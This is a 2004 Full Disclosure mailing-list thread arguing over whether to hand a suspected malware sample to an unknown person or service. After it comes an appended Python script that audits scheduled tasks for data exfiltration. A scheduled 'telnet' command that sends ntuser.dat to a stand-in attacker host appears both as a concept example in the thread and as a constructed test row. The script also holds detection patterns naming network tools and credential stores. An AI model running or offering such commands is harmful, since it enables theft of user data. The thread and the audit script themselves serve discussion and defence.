Full Disclosure mailing list archives

Re: win2kup2date.exe ?


From: James Tucker <jftucker () gmail com>
Date: Fri, 3 Sep 2004 13:46:31 +0100

On Fri, 3 Sep 2004 04:05:02 -0700 (PDT), Harlan Carvey
<keydet89 () yahoo com> wrote:
James,

I'm replying off-list for the simple fact that I can't
believe the post you sent to FD.  Your questions back
to Nick are...well, what's the right word???...it's as
if you're not even paying attention.

Apologies I will try to explain myself. I am sending this back to the
list, as it is obvious that my meaning was not clear, and there may be
some points to be learned by others also. Thank you for pointing this
out to me.

...  If you want to email me a copy of it, I'll
rip it apart and see what can be seen.

And world plus dog should entrust you with such
material because???
... most viruses, trojans and malware to not store
copies of stolen
data in their executables. Furthermore the file size
is very small.

Interesting answer, but completely non sequitur.  Nick
asked why this person should be trusted with a live
bit of malware, and your response is that it's not
very big???  What does that have to do with anything?

Malware and viruses are VERY readily available in many places across
the internet. Therefore this point should be of no concern. The only
other concern which may be important is the possibility that the
binary is carrying data from the infected system; it was this that I
was referring to. Please accept my apology for not making this clearer.

 
P.S. Send it to [...] - it's my "catch all" for
virus/unknown files. Just be sure to ZIP it up
or else the web host
won't let it through. Otherwise I have disabled
all checks/scan.
Downloads directly to a secured Linux box.

That's all very nice, but alone, far from the
makings of someone to
entrust arbitrary, suspected malware samples to.

"Entrust", just what exactly are you thinking you
might be giving away?

Well, it's pretty obvious...a live bit of malware.
It's really pretty obvious what Nick's getting
at...why send this malware to some arbitrary person?
Who's to say that he's going to use it as he says, and
not send it back out to someone else?

To what end? It would be much more useful to an attacker to go and
collect and customise one of the many readily available trojans on the
internet, rather than spreading malware which they have no control
over. IMHO your concern is closer to cynicism than practical reality.


Again, you suspect a lot of deception here, and
while it is of course
possible you are correct, I have yet to see this
ever done in practice.

You haven't seen deception in practice...in general,
or specifically in the case of VirusTotal?

If the virus was carrying data from the local system, and some hackers
had set up a fake site of the VirusTotal sort, this would be a
sophisticated way of deceiving "security pros" into passing out
details. It would be easily possible to carry all of their password
hashes, for example, if any of them run VPNs this would be a near
instant release of access passwords (an army of several hundred
zombies could decode all the LM hashes in minutes).

 
Samples of non-data carrying viruses or
trojans are of
little use to anyone other than Anti-Virus firms, as
it is easy to
collect raw source for most if one is so inclined.

Really?  Are you able to do so?  I would submit that
many with malicious intent don't know the sites and
sources you seem to be aware of, and will actually ask
for the binary...for the purpose of releasing it
against someone else.  Non-data carrying or otherwise,
it doesn't matter.  I received several IMs just this
weekend in which I was asked for running viruses.

Well, the same lack of trust may be given to you. In order to find a
balance between proving my point and not providing you with up to date
info, I will provide you with this (http://vx.netlux.org/) site as an
example, which is not carrying any modern sources at this time. You
can find these easily by trawling security sites of high standards,
they have outbound links to such sites. Google is rarely your friend
in this regard, which may be why you are not aware of the high
numeracy of such sites on the internet. Needless to say that this lack
of awareness is possibly a good thing for most people (read: reduces
script-kiddie access to such data).

 
I agree that it is unlikely they have sufficient
client licenses to
provide such a service; however I can see that there
are a great deal
of arguments in law about how their case may be won.

If a product is used in a manner for which it is not
sufficiently or correctly licensed, how can one then
use the law to win their case?  After all, it wouldn't
be "their" (ie, VirusTotal's) case...it would be a
case brought against them by the vendor.

I am not a lawyer, but I have seen cases won due to lack of definition
of a license. In this case the argument I gave is not contradicted by
any of the licenses involved as far as I can see. As I said though, I
am not a lawyer.

They may for
example only be required to carry one license, they
could argue that
they are simply allowing users to deliberately
infect their systems,
and making portions of the logs publicly available.

That doesn't make any sense at all...if they are required
to carry only one license, then their copy of the
product would be sufficiently licensed, and any case
brought against them would be over before it started.

My point exactly, until the case is brought into a court room it is
probably one of the lesser defined scenarios under current
interpretation of law.


If there are viruses which commonly copy target
system data, or
sensitive data into their binaries at the present
time (I imagine the
mention of this deception may well spring at least
one such virus)
then I apologise that I am not aware of it.

Does it matter exactly what the malicious code does?

In this case the deception could be very serious as capturing the
password details of a security professional is arguably more
"interesting" and might (possibly) be more valuable to an attacker.
This would be a good deceptive method of doing so.

As to whether generically it matters what a virus does, no, of course
if a virus is defined as being such, it is malicious and should be
removed anyway.

Sometimes it is important to know its functionality, as what if it had
secretly run a command like:
at 18:30 "echo ntuser.dat | telnet haxorsite.com:1337"

The antivirus program would remove the virus, but your registry data
would still get sent to the hacker site as this data is not illegal in
the system. Before anyone has a go at me over access to ntuser.dat /
timing issues / whatever, this is concept example only; use your heads
please.

There is always no need for aggressive statement of
suspicion, which you are close to here.
While I understand aggression due to anger, I
am concerned that one should not get angry at
someone offering them a
service merely because one is suspicious of them.
What if the offer of help is entirely genuine?

I think that you're entirely missing the point, as
I've already pointed out.

I apologise that this message of mine was not as clear as it should
have been. Thank you for pointing it out to me.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
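As an added example (not part of the thread or anyone's posted code), the check a responder could run after a clean-up, since removing the binary does not remove a job it left behind: it audits scheduled-task output for the combination the concept above describes, a sensitive file fed to a network tool. It assumes output in the shape of `schtasks /query /fo CSV /v`; the rows, task names and hostname are constructed, and the patterns are illustrative rather than complete.

```python
import csv
import io
import re

# Constructed sample in the shape of `schtasks /query /fo CSV /v` output (not captured
# from a real host); the second row mirrors the "at 18:30 ... | telnet" concept above.
SAMPLE_TASKS_CSV = """\
"TaskName","Next Run Time","Status","Task To Run"
"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","N/A","Ready","defrag.exe -c -h -o"
"\\At1","18:30:00","Ready","cmd /c echo ntuser.dat | telnet attacker.example 1337"
"\\NightlyBackup","02:00:00","Ready","robocopy C:\\Data D:\\Backup /MIR"
"""

# Illustrative patterns, not an exhaustive list: tools that push data off the host,
# and registry hives or credential stores a scheduled job has no normal reason to touch.
NETWORK_TOOLS = re.compile(r"\b(telnet|nc|ncat|ftp|tftp|curl|wget|bitsadmin)\b", re.I)
SENSITIVE_DATA = re.compile(r"ntuser\.dat|\bsam\b|lsass|reg(\.exe)?\s+save", re.I)


def classify(command: str) -> list[str]:
    """Reasons a scheduled command looks like data theft; empty list if it looks benign."""
    reasons = []
    if NETWORK_TOOLS.search(command):
        reasons.append("network tool")
    if SENSITIVE_DATA.search(command):
        reasons.append("sensitive data")
    return reasons


def audit_tasks(csv_text: str) -> list[dict]:
    """One finding per task whose command trips a pattern; both patterns together = high."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        command = row.get("Task To Run", "")
        reasons = classify(command)
        if reasons:
            findings.append({
                "task": row["TaskName"],
                "next_run": row["Next Run Time"],
                "command": command,
                "severity": "high" if len(reasons) == 2 else "medium",
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in audit_tasks(SAMPLE_TASKS_CSV):
        print(f"[{f['severity']}] {f['task']} next run {f['next_run']}: "
              f"{f['command']} ({', '.join(f['reasons'])})")
```

The same logic applies to `at` job listings or any other persistence inventory once it is parsed into task name and command.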